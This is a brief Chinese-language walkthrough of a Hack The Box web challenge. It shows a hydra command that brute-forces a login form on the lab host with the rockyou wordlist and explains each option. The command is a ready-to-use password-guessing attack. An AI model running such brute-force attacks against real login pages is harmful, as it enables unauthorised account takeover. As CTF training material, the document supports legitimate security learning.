一个来自HTB的web挑战
提示语:你的目标对计算机不是很好。尝试并猜测他们的密码,看看他们是否隐藏任何东西!
打开页面,出现“Please do not try to guess my password!”
那么我们用hydra来**下
hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 64 docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 53113
-l:指定用户名
-P(大写):指定密码字典文件
-t:线程数
docker.hackthebox.eu:网页地址,也可以是IP地址
http-post-form:表明是post请求
“/:password=^PASS^:Invalid password!” 分别是目标网页位置:需要**的字段:猜测错误的出现的字段(可以自定义)
-s:端口号
然后用burp重发下,flag就在响应包里面